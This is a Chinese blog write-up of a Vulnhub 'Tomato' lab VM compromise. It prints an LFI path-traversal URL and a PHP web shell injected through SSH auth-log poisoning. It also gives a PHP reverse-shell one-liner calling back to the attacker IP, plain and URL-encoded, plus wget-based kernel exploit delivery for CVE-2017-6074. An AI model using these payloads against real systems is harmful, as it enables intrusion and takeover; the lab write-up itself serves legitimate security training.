Vulnhub Tomato靶机渗透记录

Vulnhub Tomato靶机渗透记录

环境配置

靶机镜像下载地址:

http://www.vulnhub.com/entry/tomato-1,557/

  1. Kali Linux IP:192.168.1.128
  2. Tomato IP: 192.168.1.140

信息收集

  • 使用arp-scan -l 扫描本地局域网存活主机:
arp-scan -l

局域网新发现主机

  • nmap扫描开放端口以及相关信息:
nmap -A -p- 192.168.1.140

  • 访问http服务端口查看页面信息:查看页面源码无敏感信息
  • 没有相关可利用信息,继续访问8888端口http服务:
    需要认证,没有其他攻击点时可以尝试爆破。
  • 利用dirb对站点目录进行爆破:
dirb http://192.168.1.140

在这里插入图片描述
发现其他站点目录,尝试访问:

http://192.168.1.140/antibot_image/antibots/

进入而成目录
根据修改时间发现info.php文件最新更新,访问并查看源码:
文件包含
发现文件包含,尝试包含文件…/…/…/…/…/…/etc/passwd:

http://192.168.1.140/antibot_image/antibots/info.php?image=../../../../../../etc/passwd

漏洞利用

已知info.php文件存在文件包含漏洞,以及开放ssh端口,尝试包含ssh认证日志文件/var/log/auth.log,并利用ssh认证用户名实现命令注入:

  • 尝试用tomato作为用户名进行失败登录,观察相关日志记录:
    在这里插入图片描述查看info.php源码,发现用户名包含在日志中,实行命令注入
  • 利用<?php system($_GET['cmd']);?>作为用户名进行php代码注入:
<?php system($_GET['cmd']);?>

在这里插入图片描述

  • 验证PHP代码是否注入成功:
    访问http://192.168.1.140/antibot_image/antibots/info.php?image=../../../../../../var/log/auth.log&cmd=ls并查看网页源代码:
    命令执行成功
  • 尝试getshell,利用php反弹shell,Kali攻击机利用nc监听4444端口:
nc -lvp 4444

在这里插入图片描述

PHP反弹shell代码如下:

php -r '$sock=fsockopen("192.168.1.128",4444);exec("/bin/sh -i <&3 >&3 2>&3");'

进行url编码后得到:

php+-r+%27%24sock%3dfsockopen(%22192.168.1.128%22%2c4444)%3bexec(%22%2fbin%2fsh+-i+%3c%263+%3e%263+2%3e%263%22)%3b%27

访问http://192.168.1.140/antibot_image/antibots/info.php?image=../../../../../../var/log/auth.log&cmd=php+-r+%27%24sock%3dfsockopen(%22192.168.1.128%22%2c4444)%3bexec(%22%2fbin%2fsh+-i+%3c%263+%3e%263+2%3e%263%22)%3b%27
成功getshell:
在这里插入图片描述

权限提升

  1. 利用python打开一个终端:
python3 -c "import pty;pty.spawn('/bin/bash')"

在nc中利用python打开tty
2.查看内核版本:

uname -a

查看内核版本
利用searchsploit搜索相应内核模块:

searchsploit 4.4.0-21

在这里插入图片描述
利用44300.c,netfilter模块的提权POC,使用命令:

searchsploit -m 44300

在这里插入图片描述
查看poc信息,将44300.c分成decr.c与pwn.c两个c文件分别编译:

gedit 44300.c

在这里插入图片描述
编译出错:
在这里插入图片描述
完整安装gcc:

sudo apt-get install gcc-multilib

分别编译,编译完成(警告先不管):

gcc decr.c -m64 -O2 -o decr
gcc pwn.c -m64 -O2 -o pwn

Kali攻击机后台启动Http服务器,上传文件:

python -m SimpleHTTPServer 8080 &

在这里插入图片描述
目标主机跳转到/tmp目录下,利用wget获取提权exp:

wget http://192.168.1.128:8080/decr
wget http://192.168.1.128:8080/pwn

在这里插入图片描述
赋予exp执行权限运行提权:

chmod +x decr && chmod +x pwn

在这里插入图片描述

./decr
./pwn

提权失败。。。。
网上搜索发现github上面有一个提权相关,Kali主机git项目:

https://github.com/kkamagui/linux-kernel-exploits
git clone https://github.com/kkamagui/linux-kernel-exploits.git

在这里插入图片描述
运行compile.sh 编译c文件,并上传到目标主机,赋予执行权限,运行结果如下:

wget http://192.168.1.128:8080//linux-kernel-exploits/kernel-4.4.0-21-generic/CVE-2017-6074/CVE-2017-6074
chmod +x CVE-2017-6074

在这里插入图片描述

./CVE-2017-6074

提权成功
提权成功
但是可能是因为物理机电脑CPU不兼容,虚拟机报错:
在这里插入图片描述
不过也算渗透成功了。。。

  • 3
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 4
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值